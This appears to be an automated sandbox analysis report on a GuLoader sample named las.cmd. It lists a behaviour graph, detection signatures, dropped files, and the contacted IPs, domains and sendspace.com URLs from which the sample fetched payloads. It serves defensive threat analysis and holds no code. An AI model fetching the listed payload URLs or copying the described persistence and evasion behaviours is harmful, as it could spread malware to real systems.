Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446786 Sample: las.cmd Startdate: 23/05/2024 Architecture: WINDOWS Score: 100 40 www.sendspace.com 2->40 42 fs13n4.sendspace.com 2->42 44 fs03n2.sendspace.com 2->44 58 Malicious sample detected (through community Yara rule) 2->58 60 Antivirus detection for URL or domain 2->60 62 Yara detected GuLoader 2->62 64 5 other signatures 2->64 9 cmd.exe 1 2->9         started        signatures3 process4 signatures5 66 Suspicious powershell command line found 9->66 68 Very long command line found 9->68 12 powershell.exe 14 23 9->12         started        16 conhost.exe 9->16         started        process6 dnsIp7 48 fs03n2.sendspace.com 69.31.136.17, 443, 49731 GTT-BACKBONEGTTDE United States 12->48 50 www.sendspace.com 172.67.170.105, 443, 49730, 49738 CLOUDFLARENETUS United States 12->50 78 Suspicious powershell command line found 12->78 80 Very long command line found 12->80 82 Found suspicious powershell code related to unpacking or dynamic code loading 12->82 18 powershell.exe 17 12->18         started        21 conhost.exe 12->21         started        23 cmd.exe 1 12->23         started        signatures8 process9 signatures10 52 Writes to foreign memory regions 18->52 54 Found suspicious powershell code related to unpacking or dynamic code loading 18->54 56 Hides threads from debuggers 18->56 25 wab.exe 17 18->25         started        30 cmd.exe 1 18->30         started        process11 dnsIp12 46 fs13n4.sendspace.com 69.31.136.57, 443, 49739 GTT-BACKBONEGTTDE United States 25->46 32 C:\Windows\svchost.com, PE32 25->32 dropped 34 C:\Users\user\AppData\Local\Temp\chrome.exe, PE32 25->34 dropped 36 C:\ProgramData\...\VC_redist.x64.exe, PE32 25->36 dropped 38 149 other malicious files 25->38 dropped 70 Creates an undocumented autostart registry key 25->70 72 Hides threads from debuggers 25->72 74 Drops executable to a common third party application directory 25->74 76 Infects executable files (exe, dll, sys, html) 25->76 file13 signatures14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
69.31.136.17
 fs03n2.sendspace.com United States
3257 GTT-BACKBONEGTTDE false
172.67.170.105
 www.sendspace.com United States
13335 CLOUDFLARENETUS false
69.31.136.57
 fs13n4.sendspace.com United States
3257 GTT-BACKBONEGTTDE false

Contacted Domains

Name IP Active
fs03n2.sendspace.com 69.31.136.17 true
fs13n4.sendspace.com 69.31.136.57 true
www.sendspace.com 172.67.170.105 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://fs03n2.sendspace.com/dlpro/90cd9178b57ca9e755cc53ffd63d0a44/664f9440/wlorhs/Undertaker.pcx false
  • Avira URL Cloud: safe
 unknown
https://fs13n4.sendspace.com/dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJScPuYqxiGHOFrHH77.bin false
  • Avira URL Cloud: safe
 unknown
https://www.sendspace.com/pro/dl/wlorhs false
  • Avira URL Cloud: safe
 unknown
https://www.sendspace.com/pro/dl/g1h76h false
  • Avira URL Cloud: safe
 unknown